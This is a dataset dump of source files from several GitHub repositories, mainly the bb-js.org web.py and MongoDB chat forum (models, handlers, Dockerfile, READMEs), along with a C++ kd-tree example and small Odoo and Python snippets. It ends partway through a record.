"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 700,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 26,
"path": "/CMakeLists.txt",
"repo_name": "hiyyg/OpenFLANN",
"src_encoding": "UTF-8",
"text": "cmake_minimum_required(VERSION 3.17)\nproject(OpenFLANN)\n\nset(CMAKE_CXX_STANDARD 17)\n\nfind_package(PCL 1.7 REQUIRED)\nfind_package(Boost REQUIRED COMPONENTS system filesystem)\n\n\ninclude_directories(${PCL_INCLUDE_DIRS})\nlink_directories(${PCL_LIBRARY_DIRS})\nadd_definitions(${PCL_DEFINITIONS})\n\ninclude_directories(\n ${catkin_INCLUDE_DIRS}\n include\n)\n\nadd_executable(kdtree_benchmark src/main.cpp)\ntarget_link_libraries(kdtree_benchmark ${PCL_LIBRARIES})\n\nadd_executable(kdtree_nanoflann src/nanoflann_example.cpp)\ntarget_link_libraries(kdtree_nanoflann ${PCL_LIBRARIES})\n\nadd_executable(kdtree_picoflann src/picoflann_example.cpp)\ntarget_link_libraries(kdtree_picoflann ${PCL_LIBRARIES})\n"
},
{
"alpha_fraction": 0.5883303284645081,
"alphanum_fraction": 0.6193895936012268,
"avg_line_length": 35.894039154052734,
"blob_id": "a6f7c4c7f2ca40ff716a8a76f3341b56ec832e96",
"content_id": "8bbf3faee40736b72d9fb06b28b3993830e32b13",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 5570,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 151,
"path": "/src/picoflann_example.cpp",
"repo_name": "hiyyg/OpenFLANN",
"src_encoding": "UTF-8",
"text": "//\n// Created by shapelim on 21. 4. 14..\n//\n\n#include <random>\n#include <vector>\n#include <fstream>\n#include \"picoflann.h\"\n#include <pcl/point_cloud.h>\n#include <pcl/point_types.h>\n#include <iostream>\n#include <exception>\nvoid example1(){\n //Data type\n struct Point2f{\n Point2f(float X,float Y) { x=X;y=Y; }\n float x,y;\n };\n\n // Adapter.\n // Given an Point2f element, it returns the element of the dimension specified such that dim=0 is x and dim=1 is y\n struct PicoFlann_Point2fAdapter{\n inline float operator( )(const Point2f &elem, int dim)const { return dim==0?elem.x:elem.y; }\n };\n\n //create the points randomly\n std::default_random_engine generator;\n std::uniform_real_distribution<double> distribution(-1000.0,1000.0);\n std::vector<Point2f> data;\n for(size_t i=0;i<1000;i++)\n data.push_back( Point2f ( distribution(generator),distribution(generator)));\n ///------------------------------------------------------------\n /// Create the kdtree\n picoflann::KdTreeIndex<2,PicoFlann_Point2fAdapter> kdtree;//2 is the number of dimensions\n kdtree.build(data);\n //search 10 nearest neibors to point (0,0)\n std::vector<std::pair<uint32_t,double> > res=kdtree.searchKnn(data,Point2f(0,0),10);\n\n //radius search in a radius of 30 (the resulting distances are squared)\n res=kdtree.radiusSearch(data,Point2f(0,0),30);\n //another version\n kdtree.radiusSearch(res,data,Point2f(0,0),30);\n\n //you can save to a file\n std::ofstream file_out(\"out.bin\",std::ios::binary);\n kdtree.toStream(file_out);\n\n //recover from the file\n picoflann::KdTreeIndex<2,PicoFlann_Point2fAdapter> kdtree2;\n std::ifstream file_in(\"out.bin\",std::ios::binary);\n kdtree2.fromStream(file_in);\n res=kdtree2.radiusSearch(data,Point2f(0,0),30);\n\n}\n\n\n//Using an array of 3d points\nvoid example2(){\n\n struct Point3f{\n Point3f(float X,float Y,float Z) { data[0]=X;data[1]=Y;data[2]=Z; }\n float data[3];\n };\n struct PicoFlann_Array3f_Adapter{\n inline float operator( )(const Point3f &elem, int dim)const{ return elem.data[dim]; }\n };\n struct PicoFlann_Array3f_Container{\n const Point3f *_array;\n size_t _size;\n PicoFlann_Array3f_Container(float *array,size_t Size):_array((Point3f*)array),_size(Size){}\n inline size_t size()const{return _size;}\n inline const Point3f &at(int idx)const{ return _array [idx];}\n };\n std::default_random_engine generator;\n std::uniform_real_distribution<double> distribution(-1000.0,1000.0);\n\n int nPoints=1000;\n float *array=new float[nPoints*3];\n for(size_t i=0;i<1000*3;i++)\n array[i]= distribution(generator);\n\n ///------------------------------------------------------------\n picoflann::KdTreeIndex<3, PicoFlann_Array3f_Adapter> kdtree;// 3 is the number of dimensions, L2 is the type of distance\n kdtree.build( PicoFlann_Array3f_Container(array, nPoints));\n PicoFlann_Array3f_Container p3container(array,nPoints);\n std::vector<std::pair<uint32_t,double> > res=kdtree.searchKnn(p3container,Point3f(0,0,0),10);\n res=kdtree.radiusSearch(p3container,Point3f(0,0,0),30);\n std::cout<<\"Done!\"<<std::endl;\n}\n\n//Using an array of 3d points\nvoid example3(){\n\n struct Point3f{\n Point3f(float X,float Y,float Z) { data[0]=X;data[1]=Y;data[2]=Z; }\n float data[3];\n };\n\n struct PicoFlann_PCL_Point_Adapter{\n inline float operator( )(const pcl::PointXYZ &elem, int dim)const{\n if (dim ==0) return elem.x;\n else if (dim == 1) return elem.y;\n else if (dim == 2) return elem.z;\n else throw std::invalid_argument(\"Invalid dimension is comming\");\n }\n };\n 
struct PicoFlann_PCL_Cloud_Container{\n size_t _size;\n pcl::PointCloud<pcl::PointXYZ>::Ptr _array;\n\n PicoFlann_PCL_Cloud_Container(pcl::PointCloud<pcl::PointXYZ>::Ptr& array, size_t Size) {\n _array = array;\n _size = Size;\n }\n inline size_t size()const{return _size;}\n inline const pcl::PointXYZ &at(int idx)const{ return _array->points[idx];}\n };\n int NUM_RANDOM_SAMPLE_POINTS = 1000;\n\n double RANDOM_SCALE = 100.0;\n pcl::PointCloud<pcl::PointXYZ>::Ptr cloud(new pcl::PointCloud<pcl::PointXYZ>);\n\n // Generate pointcloud data\n cloud->width = NUM_RANDOM_SAMPLE_POINTS;\n cloud->height = 1;\n cloud->points.resize (cloud->width * cloud->height);\n\n for (std::size_t i = 0; i < cloud->size (); ++i)\n {\n (*cloud)[i].x = RANDOM_SCALE * rand () / (RAND_MAX + 1.0f);\n (*cloud)[i].y = RANDOM_SCALE * rand () / (RAND_MAX + 1.0f);\n (*cloud)[i].z = RANDOM_SCALE * rand () / (RAND_MAX + 1.0f);\n }\n ///------------------------------------------------------------\n pcl::PointXYZ searchPoint;\n\n searchPoint.x = RANDOM_SCALE * rand () / (RAND_MAX + 1.0f);\n searchPoint.y = RANDOM_SCALE * rand () / (RAND_MAX + 1.0f);\n searchPoint.z = RANDOM_SCALE * rand () / (RAND_MAX + 1.0f);\n\n picoflann::KdTreeIndex<3, PicoFlann_PCL_Point_Adapter> kdtree;// 3 is the number of dimensions, L2 is the type of distance\n kdtree.build( PicoFlann_PCL_Cloud_Container(cloud, NUM_RANDOM_SAMPLE_POINTS));\n PicoFlann_PCL_Cloud_Container p3container(cloud, NUM_RANDOM_SAMPLE_POINTS);\n std::vector<std::pair<uint32_t,double> > res=kdtree.searchKnn(p3container,searchPoint,10);\n res=kdtree.radiusSearch(p3container,searchPoint,30);\n std::cout<<\"Done!\"<<std::endl;\n}\nint main(){\n example3();\n return 0;\n}"
}
] | 6 |
sbm20202020/odoo_modules
|
https://github.com/sbm20202020/odoo_modules
|
52317a5ae37f7b02ae22d790e593dc7d0e1d1955
|
9a26b81427b40854b68fad73897e942f838d3d7e
|
12e6d8d7d8b13b5886c806401afd5472992fb3d5
|
refs/heads/main
| 2023-01-02T22:38:44.932007 | 2020-10-30T15:30:25 | 2020-10-30T15:30:25 | 308,667,324 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5708661675453186,
"alphanum_fraction": 0.5721784830093384,
"avg_line_length": 35.28571319580078,
"blob_id": "4f501f53b59b6bc4c4b3b3b349b6530c96dd7852",
"content_id": "33fb52b9970e7869f13e4068b7639096b4e64038",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 762,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 21,
"path": "/test_starly/controllers/controllers.py",
"repo_name": "sbm20202020/odoo_modules",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# from odoo import http\n\n\n# class TestStarly(http.Controller):\n# @http.route('/test_starly/test_starly/', auth='public')\n# def index(self, **kw):\n# return \"Hello, world\"\n\n# @http.route('/test_starly/test_starly/objects/', auth='public')\n# def list(self, **kw):\n# return http.request.render('test_starly.listing', {\n# 'root': '/test_starly/test_starly',\n# 'objects': http.request.env['test_starly.test_starly'].search([]),\n# })\n\n# @http.route('/test_starly/test_starly/objects/<model(\"test_starly.test_starly\"):obj>/', auth='public')\n# def object(self, obj, **kw):\n# return http.request.render('test_starly.object', {\n# 'object': obj\n# })\n"
}
] | 1 |
bb-js/bb-js.org
|
https://github.com/bb-js/bb-js.org
|
300a44cd76f6f665ef53ef9186699a1a847473d2
|
fe83d97864e4eace5546b6dd03e8ef0109afdcc7
|
0849202e8150e3db4f724475e7e9bbac0fc1f3f9
|
refs/heads/master
| 2020-12-30T21:59:18.355936 | 2015-02-28T13:19:55 | 2015-02-28T13:19:55 | 18,942,993 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5236592888832092,
"alphanum_fraction": 0.5248422622680664,
"avg_line_length": 28.488372802734375,
"blob_id": "da2d9d773fb46b0cfdf9317112ffb3cdf6c4718e",
"content_id": "097ad51dc706312353df0789caddcdee8693b328",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2570,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 86,
"path": "/src/handlers/topic.py",
"repo_name": "bb-js/bb-js.org",
"src_encoding": "UTF-8",
"text": "#coding:utf-8\nimport json\nimport sqlite3\nfrom datetime import datetime\n\nimport web\n\nfrom models import User, Topic, Message\nfrom .base import bad_request, display_time, pass_time\n\nsession = web.config._session\n\nCACHE_USER = {}\n\n\nclass TopicHandler:\n def GET(self, pk=None):\n if pk:\n topic = Topic.get_by_id(pk)\n topic['created_time'] = display_time(topic['created_time'])\n return json.dumps(topic)\n\n topics = Topic.get_all()\n result = []\n for t in topics:\n topic = dict(t)\n if 'tags' not in topic:\n topic['tags'] = ''\n\n try:\n user = CACHE_USER[t.owner_id]\n except KeyError:\n user = User.get_by_id(t.owner_id)\n CACHE_USER[t.owner_id] = user\n topic['owner_name'] = user.username\n topic['created_time'] = display_time(topic['created_time'])\n\n message = Message.get_latest_by_topic(str(t.id))\n message_count = Message.topic_count(str(t.id))\n if message:\n # 最新回复\n try:\n user = CACHE_USER[message.user_id]\n except KeyError:\n user = User.get_by_id(message.user_id)\n CACHE_USER[message.user_id] = user\n message.user_name = user.username\n message.created_time = pass_time(message.created_time)\n topic['new_comment'] = message\n topic['message_count'] = message_count\n result.append(topic)\n return json.dumps(result)\n\n def POST(self):\n if not session.user or session.user.id is None:\n return bad_request('请先登录!')\n\n data = web.data()\n data = json.loads(data)\n\n tags = [tag for tag in data.get('tags', '').split(' ') if tag]\n topic_data = {\n \"title\": data.get('title'),\n \"tags\": tags,\n \"owner_id\": session.user.id,\n \"created_time\": datetime.now(),\n }\n\n try:\n topic_id = Topic.create(**topic_data)\n except sqlite3.IntegrityError:\n return bad_request('你已创建过该名称!')\n\n topic_data.update({\n \"id\": topic_id,\n \"owner_name\": session.user.username,\n \"created_time\": display_time(topic_data.get('created_time')),\n })\n return json.dumps(topic_data)\n\n def PUT(self, obj_id=None):\n data = web.data()\n print data\n\n def DELETE(self, obj_id=None):\n pass\n"
},
{
"alpha_fraction": 0.5333720445632935,
"alphanum_fraction": 0.5368543267250061,
"avg_line_length": 22.283782958984375,
"blob_id": "02879128bdcd24ffb17ed6f8674e6ef2ec431b31",
"content_id": "9e1b47051204336643ef6bb8754dd910113adf9d",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3450,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 148,
"path": "/src/models.py",
"repo_name": "bb-js/bb-js.org",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\nfrom web import Storage\nfrom pymongo import MongoClient\nimport markdown\n\n\n# docker instance name: mongodb\nclient = MongoClient('mongodb', 27017)\ndb = client.bb_js_db\n\n\ndef get_next_id(name):\n name = 'counter_%s' % name\n ret = None\n try:\n ret = db.counters.find_and_modify(\n query={'_id': name},\n update={'$inc': {'seq': 1}},\n upsert=True\n )\n except TypeError:\n db.counters.insert(\n {\n \"_id\": name,\n \"seq\": 0\n }\n )\n if ret:\n return ret.get('seq')\n return 0\n\n\nclass class_property(object):\n def __init__(self, func):\n self.func = func\n\n def __get__(self, instance, klass):\n return self.func(klass)\n\n\nclass DBManage(object):\n @class_property\n def table(cls):\n return cls.__name__.lower()\n\n @classmethod\n def get_by_id(cls, id):\n id = int(id)\n obj = db[cls.table].find_one({'_id': id})\n return Storage(**obj)\n\n @classmethod\n def get_all(cls):\n return [Storage(**obj) for obj in db[cls.table].find().sort(\"_id\", -1)]\n\n @classmethod\n def create(cls, **model_dict):\n _id = get_next_id(cls.table)\n model_dict.update({\n '_id': _id,\n 'id': _id,\n })\n return db[cls.table].insert(model_dict)\n\n @classmethod\n def update(cls, **model_dict):\n query = {\"_id\": model_dict.pop('id')}\n return db[cls.table].update(query, model_dict)\n\n @classmethod\n def delete(cls, id):\n query = {\"_id\": id}\n db[cls.table].update(query, {'available': False})\n\n\nclass User(DBManage):\n id = None\n username = None\n password = None\n registed_time = None\n\n @classmethod\n def get_by_id(cls, id):\n obj = super(User, cls).get_by_id(id)\n obj.pop('password')\n obj.pop('registed_time')\n return obj\n\n @classmethod\n def get_by_username_password(cls, username, password):\n query = {\"username\": username, \"password\": password}\n user = [Storage(obj) for obj in db[cls.table].find(query)]\n try:\n obj = user[0]\n except IndexError:\n return None\n obj.pop('password')\n obj.pop('registed_time')\n return obj\n\n\nclass Topic(DBManage):\n id = None\n title = None\n created_time = None\n owner = None\n\n\nclass Message(DBManage):\n id = None\n content = None\n top_id = None\n user_id = None\n reply_to = None\n\n @classmethod\n def topic_count(cls, topic_id):\n query = {\n \"topic_id\": topic_id\n }\n return db[cls.table].find(query).count()\n\n @classmethod\n def get_latest_by_topic(cls, topic_id):\n query = {\n \"topic_id\": topic_id,\n }\n result = db[cls.table].find_one(query, sort=[(\"_id\", -1)])\n if result:\n return Storage(result)\n\n @classmethod\n def get_by_topic(cls, topic_id):\n query = {\n \"topic_id\": topic_id\n }\n return [obj for obj in db[cls.table].find(query)]\n\n @classmethod\n def create(cls, **model_dict):\n raw_content = model_dict.pop('content')\n # markdown处理\n content = markdown.markdown(raw_content, safe_mode=True)\n model_dict.update({\n 'content': content,\n 'raw_content': raw_content\n })\n return super(Message, cls).create(**model_dict)\n"
},
{
"alpha_fraction": 0.5332600474357605,
"alphanum_fraction": 0.5338097810745239,
"avg_line_length": 29.316667556762695,
"blob_id": "bfaadad0478ca75d28278b7b5a55f3f5199b2ba7",
"content_id": "10649204367c4ece94ea9eb99c63a317c229790d",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1829,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 60,
"path": "/src/handlers/message.py",
"repo_name": "bb-js/bb-js.org",
"src_encoding": "UTF-8",
"text": "#coding:utf-8\nimport json\nfrom datetime import datetime\n\nimport web\n\nfrom models import Message, User\nfrom .base import bad_request, display_time\n\nsession = web.config._session\n\nCACHE_USER = {}\n\n\nclass MessageHandler:\n def GET(self):\n topic_id = web.input().get('topic_id')\n if topic_id:\n messages = Message.get_by_topic(topic_id) or []\n else:\n messages = Message.get_all()\n\n result = []\n current_user_id = session.user.id\n for m in messages:\n try:\n user = CACHE_USER[m.get('user_id')]\n except KeyError:\n user = User.get_by_id(m.get('user_id'))\n CACHE_USER[m.get('user_id')] = user\n message = dict(m)\n message['created_time'] = display_time(message['created_time'])\n message['user_name'] = user.username\n message['is_mine'] = (current_user_id == user.id)\n result.append(message)\n return json.dumps(result)\n\n def POST(self):\n data = web.data()\n data = json.loads(data)\n if not session.user or session.user.id is None:\n return bad_request(\"请先登录!\")\n\n message_data = {\n \"content\": data.get(\"content\"),\n \"topic_id\": data.get(\"topic_id\"),\n \"user_id\": session.user.id,\n \"created_time\": datetime.now(),\n }\n m_id = Message.create(**message_data)\n result = {\n \"id\": m_id,\n \"content\": message_data.get(\"content\"),\n \"topic_id\": message_data.get(\"topic_id\"),\n \"user_id\": session.user.id,\n \"user_name\": session.user.username,\n \"created_time\": display_time(message_data.get(\"created_time\")),\n \"is_mine\": True,\n }\n return json.dumps(result)\n"
},
{
"alpha_fraction": 0.6112499833106995,
"alphanum_fraction": 0.6349999904632568,
"avg_line_length": 21.22222137451172,
"blob_id": "898cb084e3b02e26a3f01e1e5cdd5081022a203d",
"content_id": "1eba618156e1fd636e95269be21df9e1f1b0aafa",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 820,
"license_type": "permissive",
"max_line_length": 57,
"num_lines": 36,
"path": "/src/handlers/base.py",
"repo_name": "bb-js/bb-js.org",
"src_encoding": "UTF-8",
"text": "#coding:utf-8\nfrom datetime import datetime\n\nimport web\n\n\ndef bad_request(message):\n raise web.BadRequest(message=message)\n\n\ndef display_time(_datetime, format='%y-%m-%d %H:%M:%S'):\n return _datetime.strftime(format)\n\n\ndef pass_time(_datetime):\n duration = datetime.now() - _datetime\n if duration.days > 1:\n return \"%s天前\" % duration.days\n\n hours, minutes, seconds = convert_timedelta(duration)\n if hours > 0:\n return \"%s小时前\" % hours\n\n if minutes > 0:\n return \"%s分钟前\" % minutes\n\n if seconds > 0:\n return \"%s秒前\" % seconds\n\n\ndef convert_timedelta(duration):\n days, seconds = duration.days, duration.seconds\n hours = days * 24 + seconds // 3600\n minutes = (seconds % 3600) // 60\n seconds = (seconds % 60)\n return hours, minutes, seconds\n"
},
{
"alpha_fraction": 0.6873562932014465,
"alphanum_fraction": 0.7586206793785095,
"avg_line_length": 20.75,
"blob_id": "25c363872a7d0e317bddac58fc6ef1e102ed7e37",
"content_id": "9fb6ebdd040b8f610140262a7dd9a24473d3eb07",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 435,
"license_type": "permissive",
"max_line_length": 89,
"num_lines": 20,
"path": "/Dockerfile",
"repo_name": "bb-js/bb-js.org",
"src_encoding": "UTF-8",
"text": "FROM centos:7\nMAINTAINER the5fire \"[email protected]\"\nENV REFRESHED_AT 2015-01-28\nENV PYTHONUNBUFFERED 1\n\nRUN rpm -iUvh http://dl.fedoraproject.org/pub/epel/7/x86_64/e/epel-release-7-5.noarch.rpm\nRUN yum -y update\nRUN yum -y install gcc\nRUN yum -y install python-devel python-pip\n\nRUN mkdir /code\nWORKDIR /code\nADD ./ /code/\nRUN pip install -r /code/requirements.txt\nWORKDIR /code/src/\n\nEXPOSE 8001\nEXPOSE 10843\n\nCMD /code/src/bb_server.py 8001\n"
},
{
"alpha_fraction": 0.64673912525177,
"alphanum_fraction": 0.6521739363670349,
"avg_line_length": 14.333333015441895,
"blob_id": "91e5abc50f3375894eac80c1dc4286ac6984c983",
"content_id": "d4857071e0583b1e192f1d4f3d66c7465366ed81",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 188,
"license_type": "permissive",
"max_line_length": 50,
"num_lines": 12,
"path": "/src/handlers/index.py",
"repo_name": "bb-js/bb-js.org",
"src_encoding": "UTF-8",
"text": "#coding:utf-8\n\nimport web\n\nsession = web.config._session\n\n\n# 首页\nclass IndexHandler:\n def GET(self):\n render = web.template.render('templates/')\n return render.index()\n"
},
{
"alpha_fraction": 0.6379310488700867,
"alphanum_fraction": 0.6724137663841248,
"avg_line_length": 28,
"blob_id": "7fdb141c1f348b14f03054a2f1a00980d976956e",
"content_id": "6b3c2f49e7f2d00c2373732ad6c0dca6b7b21b95",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 58,
"license_type": "permissive",
"max_line_length": 45,
"num_lines": 2,
"path": "/src/run.sh",
"repo_name": "bb-js/bb-js.org",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\nnohup python bb_server.py > access.log 2>&1 &\n"
},
{
"alpha_fraction": 0.5682961940765381,
"alphanum_fraction": 0.5686556696891785,
"avg_line_length": 26.544553756713867,
"blob_id": "71c573d1bce9c2b51a6126c4d8e480e7b3bd1656",
"content_id": "18dad9778749df1dab0f0ab7094989f308646bb9",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2934,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 101,
"path": "/src/handlers/socket.py",
"repo_name": "bb-js/bb-js.org",
"src_encoding": "UTF-8",
"text": "#coding:utf-8\nimport copy\nfrom datetime import datetime\n\nimport web\nfrom socketio import socketio_manage\nfrom socketio.namespace import BaseNamespace\nfrom socketio.mixins import RoomsMixin, BroadcastMixin\nimport markdown\n\nfrom models import Message\nfrom .base import display_time\n\nsession = web.config._session\n\nCACHE_USER = {}\n\n\nclass ChatNamespace(BaseNamespace, RoomsMixin, BroadcastMixin):\n def on_go_out(self):\n room_num = self.socket.session.get('room')\n if room_num:\n print 'go_out', room_num\n self.leave(room_num)\n\n def on_index(self, username):\n user = self.environ['user']\n if user is None:\n user = {\"username\": username}\n if user not in self.request['online_users']:\n self.request['online_users'].append(user)\n self.broadcast_event('online_users', self.request['online_users'])\n\n def on_topic(self, topic_id):\n \"\"\" 加入以某个主题id为房间\n\n 客户端进入聊天室界面先发送此请求,确定房间号\n \"\"\"\n room_num = 'room_%s' % topic_id\n self.socket.session['room'] = room_num\n print 'join', room_num\n self.join(room_num)\n\n def on_message(self, model):\n user = self.environ['user']\n if user is None:\n # 手动从store中取出user\n session_id = self.environ['session_id']\n _data = session.store[session_id]\n user = _data['user']\n model.update({\n \"user_id\": user.id,\n \"created_time\": datetime.now(),\n })\n m_id = Message.create(**model)\n raw_content = model.get('content')\n model.update({\n \"content\": markdown.markdown(raw_content),\n \"raw_content\": raw_content,\n \"user_name\": user.username,\n 'id': m_id,\n 'created_time': display_time(model['created_time']),\n 'is_mine': True,\n })\n # 发送回客户端\n self.emit('message', model)\n\n # 发送给其他人\n model['is_mine'] = False\n self.emit_to_room(\n self.socket.session['room'],\n 'message',\n model,\n )\n\n def recv_disconnect(self):\n user = self.environ['user']\n try:\n self.request['online_users'].remove(user)\n except ValueError:\n # 忽略不存在用户的异常\n pass\n self.broadcast_event('online_users', self.request['online_users'])\n\n self.disconnect(silent=True)\n\nrequest = {\n 'online_users': []\n}\n\n\nclass SocketHandler:\n def GET(self):\n context = copy.copy(web.ctx.environ)\n context.update({\n \"user\": session.user,\n \"session_id\": session.session_id,\n })\n socketio_manage(context, {'': ChatNamespace}, request)\n # 重新载入session数据,因为session在socket请求中改变了\n session._load()\n"
},
{
"alpha_fraction": 0.6770833134651184,
"alphanum_fraction": 0.7708333134651184,
"avg_line_length": 12.714285850524902,
"blob_id": "555ae8d7c4508ed981d74b82c98b8ac65d23b472",
"content_id": "5f77777a9a3acc3f879332d24b15717dc7e7e7aa",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 96,
"license_type": "permissive",
"max_line_length": 23,
"num_lines": 7,
"path": "/requirements.txt",
"repo_name": "bb-js/bb-js.org",
"src_encoding": "UTF-8",
"text": "web.py\ngevent==1.0.1\ngevent-socketio==0.3.6\ngevent-websocket==0.9.3\nsupervisor\npymongo\nmarkdown\n"
},
{
"alpha_fraction": 0.6557930111885071,
"alphanum_fraction": 0.674915611743927,
"avg_line_length": 26.78125,
"blob_id": "c1045690d11477fcf548026a95e644f7d6aa7700",
"content_id": "763c3d4a18d9f4697878f0bb2edeee6294be71c1",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 1277,
"license_type": "permissive",
"max_line_length": 198,
"num_lines": 32,
"path": "/README.rst",
"repo_name": "bb-js/bb-js.org",
"src_encoding": "UTF-8",
"text": "bb-js.org\n==================\n\n是从 `Backbonejs入门教程第二版 <https://github.com/the5fire/backbonejs-learning-note>`_ 中最终演化的 `Wechat <https://github.com/the5fire/wechat>`_ 项目fork出来的。打算搞一个Backbonejs的中文社区,开发者除了可以在里面交流技术,还是通过技术共同构建社区——实践技术。\n\n\n本地运行此项目\n-------------------------\n\n::\n\n git clone https://github.com/bb-js/bb-js.org\n cd bb-js.org && pip install -r requirements.txt\n cd src\n python init_sqlite.py\n python bb_server.py\n\n然后打开浏览器输入http://127.0.0.1:8080,就能看到了。\n\n\n如何贡献代码\n-------------------------\n\n1. fork一份到你的仓库中\n2. 从你的仓库clone到本地: ``git clone [email protected]:yourname/bb-js.org``\n3. 发现bug时: ``git checkout -b fix-<some>-bug`` ,修改完bug,push到github\n4. 然后在你fork的项目上就能看到一个pull-request的按钮,点它,之后安装提示操作。\n5. 更新你的仓库和官方一致。创建一个upstream(上游)的源: ``git remote add upstream https://github.com/bb-js/bb-js.org`` ::\n\n 用来更新官方代码到你的fork仓库中,通过该命令:\n git pull upstream master\n git merge upstream/master\n"
},
{
"alpha_fraction": 0.3072916567325592,
"alphanum_fraction": 0.40625,
"avg_line_length": 15,
"blob_id": "55259f4543479aee19468e5d23c399212c57d785",
"content_id": "70b1369db8ace3e614790d9858f718906166e11e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 326,
"license_type": "permissive",
"max_line_length": 35,
"num_lines": 12,
"path": "/CHANGELOG.rst",
"repo_name": "bb-js/bb-js.org",
"src_encoding": "UTF-8",
"text": "更新日志\n=========================\n\n2014-05-09已有功能\n-----------------------------------\n1. 登录注册\n2. 发表话题(标题,时间,创建人)\n3. 实时发布消息(内容,时间,创建人)\n\n2014-06-19\n------------------------\n在话题列表页显示每个话题的回复数和最新一条回复\n"
},
{
"alpha_fraction": 0.5526450872421265,
"alphanum_fraction": 0.5552131533622742,
"avg_line_length": 21.63953399658203,
"blob_id": "178d84f0759dc310ed33cfbbecfb0016f5aba9f3",
"content_id": "db3995798a791c24eb1dbf7845029a401c53ba92",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2017,
"license_type": "permissive",
"max_line_length": 53,
"num_lines": 86,
"path": "/src/handlers/user.py",
"repo_name": "bb-js/bb-js.org",
"src_encoding": "UTF-8",
"text": "#coding:utf-8\nimport json\nimport hashlib\nimport sqlite3\nfrom datetime import datetime\n\nimport web\n\nfrom models import User\nfrom .base import bad_request\n\nsession = web.config._session\n\nCACHE_USER = {}\n\n\ndef sha1(data):\n return hashlib.sha1(data).hexdigest()\n\n\nclass UserHandler:\n def GET(self):\n # 获取当前登录的用户数据\n user = session.user\n return json.dumps(user)\n\n def POST(self):\n data = web.data()\n data = json.loads(data)\n username = data.get(\"username\")\n password = data.get(\"password\")\n password_repeat = data.get(\"password_repeat\")\n\n if password != password_repeat:\n return bad_request('两次密码输入不一致')\n\n user_data = {\n \"username\": username,\n \"password\": sha1(password),\n \"registed_time\": datetime.now(),\n }\n\n try:\n user_id = User.create(**user_data)\n except sqlite3.IntegrityError:\n return bad_request('用户名已存在!')\n\n user = User.get_by_id(user_id)\n session.login = True\n session.user = user\n\n result = {\n 'id': user_id,\n 'username': username,\n }\n return json.dumps(result)\n\n\nclass LoginHandler:\n def POST(self):\n data = web.data()\n data = json.loads(data)\n username = data.get(\"username\")\n password = data.get(\"password\")\n user = User.get_by_username_password(\n username=username,\n password=sha1(password)\n )\n if not user:\n return bad_request('用户名或密码错误!')\n\n session.login = True\n session.user = user\n result = {\n 'id': user.get('_id'),\n 'username': user.get('username'),\n }\n return json.dumps(result)\n\n\nclass LogoutHandler:\n def GET(self):\n session.login = False\n session.user = None\n session.kill()\n return web.tempredirect('/#login')\n"
}
] | 12 |
ZionDeng/Advanced-Control-Design
|
https://github.com/ZionDeng/Advanced-Control-Design
|
c471c44b3044b94e197147ec566811be8d1a5ffd
|
1e82cdd1b98e95a0d210808e89eff4536efc9e73
|
9d0d4db62ebc84460c7d6f53ac28cbe315407592
|
refs/heads/master
| 2023-01-29T07:50:21.805723 | 2020-12-09T15:48:56 | 2020-12-09T15:48:56 | 312,738,867 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.675000011920929,
"alphanum_fraction": 0.7083333134651184,
"avg_line_length": 19.16666603088379,
"blob_id": "dd138ab13cf2693d1dc62aaafe0c1b75149e77f8",
"content_id": "06ee366e38a5f4a6c160577de5998ca1eb347020",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 120,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 6,
"path": "/py_files/test_midterm.py",
"repo_name": "ZionDeng/Advanced-Control-Design",
"src_encoding": "UTF-8",
"text": "import numpy as np \n\ntest = np.arange(12).reshape((6,2))\n# print(test)\ntest_flatten = test.flatten()\nprint(test_flatten)"
},
{
"alpha_fraction": 0.592858612537384,
"alphanum_fraction": 0.634516716003418,
"avg_line_length": 27.005746841430664,
"blob_id": "fae0f7ded93b0681f6a289691b0ff70182c257c2",
"content_id": "67ae3a28d1fc99dbc92060b92eefe97906503a77",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4873,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 174,
"path": "/py_files/Lab3_opt_pyomo.py",
"repo_name": "ZionDeng/Advanced-Control-Design",
"src_encoding": "UTF-8",
